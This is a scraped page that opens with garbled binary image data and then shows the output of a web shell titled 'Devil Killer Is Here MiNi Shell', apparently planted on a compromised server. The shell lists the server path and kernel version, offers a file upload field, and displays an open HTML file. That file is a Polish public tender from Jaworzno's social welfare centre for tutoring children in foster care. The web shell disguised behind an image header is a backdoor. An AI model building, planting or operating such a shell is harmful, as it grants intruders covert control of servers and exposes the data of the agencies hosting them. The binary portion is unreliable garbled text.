JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250814/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250814/0037768001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa polegająca na udzielaniu korepetycji z języka angielskiego, języka polskiego, matematyki, fizyki dzieciom przebywającym w rodzinnej pieczy zastępczej,<br/>w podziale na 4 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasta Jaworzna, Miejski Ośrodek Pomocy Społecznej w Jaworznie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 6322010013</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Północna 9b</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jaworzno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">326181840</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mops@mops.jaworzno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mops.jaworzno.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa polegająca na udzielaniu korepetycji z języka angielskiego, języka polskiego, matematyki, fizyki dzieciom przebywającym w rodzinnej pieczy zastępczej,<br/>w podziale na 4 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1caaac20-cd4f-4a8b-9a13-95fab4f0c932</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00377680</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00064177/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługa polegająca na udzielaniu korepetycji z języka angielskiego, języka polskiego, matematyki, fizyki dzieciom przebywającym w rodzinnej pieczy zastępczej, w podziale na 4 części.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Nowy Wymiar Pieczy Zastępczej - wsparcie i rozwój usług systemu pieczy zastępczej, który jest współfinansowany ze środków Europejskiego Funduszu Społecznego Plus, w ramach Funduszy Europejskich dla Śląskiego 2021-2027, Priorytet FESL.07.00 – Fundusze Europejskie dla społeczeństwa, Działanie FESL.07.07 – Wsparcie rodziny, dzieci i młodzieży oraz deinstytucjonalizacja pieczy zastępczej. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1caaac20-cd4f-4a8b-9a13-95fab4f0c932 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się elektronicznie przez Platformę<br/>e-Zamówienia (https://ezamowienia.gov.pl). Zamawiający dopuszcza komunikację za pośrednictwem e-mail: przetargi@mops.jaworzno.pl za wyjątkiem składania<br/>i wycofania oferty lub wniosku o dopuszczenie do udziału w postępowaniu, jeśli wystąpią okoliczności niezależne od Wykonawcy uniemożliwiające komunikację przez platformę e-Zamówienia.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania wykonawcy kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego.<br/>2. Oferta, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, pełnomocnictwo, dokumenty, o których mowa w art. 94 ust. 2 ustawy Pzp sporządza się z zachowaniem postaci elektronicznej w formacie danych zgodnym z rozporządzeniem Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jedn. Dz.U. z 2024, poz. 773).<br/>3. Ze względów technicznych zamawiający rekomenduje stosowanie formatów .pdf, .doc, .docx lub .odt. W przypadku zastosowania innego formatu niż wynikające z powyższych przepisów, Zamawiający może nie mieć możliwości zapoznania się z ofertą. Zamawiający zaleca stosowanie plików o rozszerzeniu .pdf używając formatu kwalifikowanego podpisu PadES. W przypadku gdy Wykonawca chce załączyć dokument elektroniczny o rozszerzeniu innym niż ww. wtedy powinien podpisać dokument za pomocą formatu XadES.<br/> 4. Ofertę należy złożyć za pośrednictwem platformy e-zamówienia pod adresem https://ezamowienia.gov.pl<br/>5. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze do komunikacji”.<br/>6. Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik).<br/>7. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>8. Wszystkie wysyłane i odbierane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>10. Minimalne wymagania techniczne:<br/>1)	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>2)	w przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w kafelku „Moje zgłoszenia w Centrum pomocy” – „Nowe zgłoszenie” lub w kafelku „FAQ” – „Nie znalazłem rozwiązania, chcę zgłosić problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO dostępna w Rozdziale XLII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.271.1.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – Korepetycje z języka angielskiego.<br/>1.	Przedmiot zamówienia.<br/>1)	Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu oraz przeprowadzeniu korepetycji z języka angielskiego.<br/>2)	Wykonawca realizować będzie korepetycje w formie indywidualnej pracy z każdym z uczestników projektu.	<br/>3)	Celem zajęć jest wyrównanie szans edukacyjnych uczestników projektu poprzez wsparcie w nauce oraz nadrabianie zaległości szkolnych.<br/>4)	Wsparciem zostanie objętych maksymalnie 30 dzieci uczęszczających do szkół podstawowych i ponadpodstawowych.<br/>5)	Wykonawca zobowiązuje się do sukcesywnej realizacji przedmiotu zamówienia przez okres 27 miesięcy, licząc od dnia podpisania umowy, jednak nie wcześniej niż od 1 października 2025 r. Zastrzega się, że w miesiącach lipiec<br/>i sierpień usługa może być realizowana w ograniczonym zakresie lub nie być świadczona. <br/>6) Osoba wskazana do realizacji zamówienia musi posiadać:<br/> a)pełną zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych;<br/> b) status osoby, która jest niekarana za umyślne przestępstwo przeciwko życiu i zdrowiu, przestępstwo przeciwko wolności seksualnej i obyczajowości, przestępstwo przeciwko rodzinie i opiece, z wyjątkiem przestępstwa określonego w art. 209 ustawy z dnia 6 czerwca 1997 r. – Kodeks karny, przestępstwo określone w rozdziale 7 ustawy z dnia 29 lipca 2005 r. o przeciwdziałaniu narkomanii albo wobec, której nie orzeczono zakazu prowadzenia działalności związanej z wychowywaniem, leczeniem, edukacją małoletnich lub opieką nad nimi lub zakazu przebywania<br/>w określonych środowiskach lub miejscach, kontaktowania się<br/>z określonymi osobami, zbliżania się do określonych osób lub opuszczania określonego miejsca pobytu bez zgody sądu;<br/> c) status osoby, która nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym.<br/>2. Liczba godzin wsparcia w formie korepetycji z języka angielskiego wynosi: 528 Jedna godzina zajęć to 60 minut (pełna godzina zegarowa). Wskazana liczba godzin ma charakter maksymalny, natomiast minimalna gwarantowana realizacja wynosi 80% tej liczby.<br/>3.	Zajęcia będą odbywać się w formie stacjonarnej. Wykonawca zapewni miejsce świadczenia usługi na terenie miasta Jaworzna. <br/>4. Zakres wsparcia.<br/>1)	Zakres merytoryczny zajęć obejmuje:<br/> a) pomoc w opanowaniu materiału realizowanego w szkole,<br/> b) nadrabianie zaległości edukacyjnych,<br/> c) wsparcie w odrabianiu prac domowych,<br/> d) przygotowanie do sprawdzianów, egzaminu ósmoklasisty, egzaminu maturalnego oraz innych, w zależności od potrzeb. <br/>5. Obowiązki korepetytora / Wykonawcy.<br/>1)	Prowadzenie dokumentacji realizacji zajęć zgodnie z wytycznymi Zamawiającego, w tym m.in.:<br/> a) dziennik zajęć,<br/> b) listy obecności.<br/> 2)	Sporządzanie comiesięcznych raportów ewaluacyjnych, zawierających:<br/> a) ocenę efektów wsparcia,<br/> b) liczbę przeprowadzonych godzin,<br/> c) rekomendacje dotyczące dalszego rozwoju edukacyjnego uczestników.<br/>3)	Realizacja usług w sposób staranny, skuteczny i terminowy, zgodnie z harmonogramem ustalonym z:<br/> a) Działem Pieczy Zastępczej <br/> b) uczestnikami projektu.<br/>4)	Utrzymywanie stałego kontaktu z Działem Strategii i Rozwoju Usług Społecznych i Działem Pieczy Zastępczej, w tym:<br/> a) niezwłoczne zgłaszanie problemów,<br/> b) terminowe przekazywanie dokumentów rozliczeniowych po zakończeniu miesiąca <br/>5)	Prowadzenie zajęć od poniedziałku do soboty, z uwzględnieniem planu zajęć szkolnych uczestników.	<br/>6)	Zapewnienie materiałów i pomocy dydaktycznych niezbędnych do realizacji zajęć.<br/>6.	Warunki organizacyjne.<br/>1)	Zajęcia kierowane są do dzieci uczęszczających do szkół podstawowych i ponadpodstawowych.<br/>2)	Osoba prowadząca zajęcia musi posiadać wiedzę odpowiednią do poziomu nauczania uczestnika.<br/>7.	Dodatkowe informacje i warunki realizacji usług.<br/>1)	Wśród uczestników zajęć mogą znajdować się osoby <br/>z niepełnosprawnościami.<br/>2)	Wykonawca zobowiązany jest do zapewnienia we własnym zakresie sprawnego technicznie sprzętu niezbędnego do prawidłowego i zgodnego z celem zamówienia wykonania usługi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80200000-6 - Usługi szkolnictwa średniego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">27 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Korepetycje z języka polskiego.<br/>1.	Przedmiot zamówienia.<br/>1)	Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu oraz przeprowadzeniu korepetycji z języka polskiego.<br/>2)	Wykonawca realizować będzie korepetycje w formie indywidualnej pracy<br/>z każdym z uczestników projektu.	<br/>3)	Celem zajęć jest wyrównanie szans edukacyjnych uczestników projektu poprzez wsparcie w nauce oraz nadrabianie zaległości szkolnych.<br/>4)	Wsparciem zostanie objętych maksymalnie 30 dzieci uczęszczających<br/>do szkół podstawowych i ponadpodstawowych.<br/>5)	Wykonawca zobowiązuje się do sukcesywnej realizacji przedmiotu zamówienia przez okres 27 miesięcy, licząc od dnia podpisania umowy, jednak nie wcześniej niż od 1 października 2025 r. Zastrzega się, że w miesiącach lipiec<br/>i sierpień usługa może być realizowana w ograniczonym zakresie lub nie być świadczona. <br/>6) Osoba wskazana do realizacji zamówienia musi posiadać:<br/> a) pełną zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych;<br/> b) status osoby, która jest niekarana za umyślne przestępstwo przeciwko życiu i zdrowiu, przestępstwo przeciwko wolności seksualnej <br/>i obyczajowości, przestępstwo przeciwko rodzinie i opiece, z wyjątkiem przestępstwa określonego w art. 209 ustawy z dnia 6 czerwca 1997 r. – Kodeks karny, przestępstwo określone w rozdziale 7 ustawy z dnia 29 lipca 2005 r. o przeciwdziałaniu narkomanii albo wobec, której nie orzeczono zakazu prowadzenia działalności związanej z wychowywaniem, leczeniem, edukacją małoletnich lub opieką nad nimi lub zakazu przebywania<br/>w określonych środowiskach lub miejscach, kontaktowania się <br/>z określonymi osobami, zbliżania się do określonych osób lub opuszczania określonego miejsca pobytu bez zgody sądu;<br/> c) status osoby, która nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym.<br/>2. Liczba godzin wsparcia w formie korepetycji z języka polskiego wynosi: 96 Jedna godzina zajęć to 60 minut (pełna godzina zegarowa). Wskazana liczba godzin ma charakter maksymalny, natomiast minimalna gwarantowana realizacja wynosi 80% tej liczby.<br/>3.	Zajęcia będą odbywać się w formie stacjonarnej. Wykonawca zapewni miejsce świadczenia usługi na terenie miasta Jaworzna. <br/>4. Zakres wsparcia.<br/>1)	Zakres merytoryczny zajęć obejmuje:<br/> a)pomoc w opanowaniu materiału realizowanego w szkole,<br/> b)nadrabianie zaległości edukacyjnych,<br/> c)wsparcie w odrabianiu prac domowych,<br/> d)przygotowanie do sprawdzianów, egzaminu ósmoklasisty, egzaminu maturalnego oraz innych, w zależności od potrzeb. <br/>5. Obowiązki korepetytora / Wykonawcy.<br/>1)	Prowadzenie dokumentacji realizacji zajęć zgodnie z wytycznymi Zamawiającego, w tym m.in.:<br/> a)dziennik zajęć,<br/> b)listy obecności.<br/> 2)	Sporządzanie comiesięcznych raportów ewaluacyjnych, zawierających:<br/> a)ocenę efektów wsparcia,<br/> b)liczbę przeprowadzonych godzin,<br/> c)rekomendacje dotyczące dalszego rozwoju edukacyjnego uczestników.<br/>3)	Realizacja usług w sposób staranny, skuteczny i terminowy, zgodnie z harmonogramem ustalonym z:<br/> a)Działem Pieczy Zastępczej,<br/> b) uczestnikami projektu.<br/>4)	Utrzymywanie stałego kontaktu z Działem Strategii i Rozwoju Usług Społecznych i Działem Pieczy Zastępczej, w tym:<br/> a) niezwłoczne zgłaszanie problemów,<br/> b)terminowe przekazywanie dokumentów rozliczeniowych po zakończeniu miesiąca.<br/>5)	Prowadzenie zajęć od poniedziałku do soboty, z uwzględnieniem planu zajęć szkolnych uczestników.	<br/>6)	Zapewnienie materiałów i pomocy dydaktycznych niezbędnych do realizacji zajęć.<br/>6.	Warunki organizacyjne.<br/>1)	Zajęcia kierowane są do dzieci uczęszczających do szkół podstawowych<br/>i ponadpodstawowych.<br/>2)	Osoba prowadząca zajęcia musi posiadać wiedzę odpowiednią do poziomu nauczania uczestnika.<br/>7.	Dodatkowe informacje i warunki realizacji usług.<br/>1)	Wśród uczestników zajęć mogą znajdować się osoby<br/>z niepełnosprawnościami.<br/>2)	Wykonawca zobowiązany jest do zapewnienia we własnym zakresie sprawnego technicznie sprzętu niezbędnego do prawidłowego i zgodnego<br/>z celem zamówienia wykonania usługi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80200000-6 - Usługi szkolnictwa średniego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">27 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty 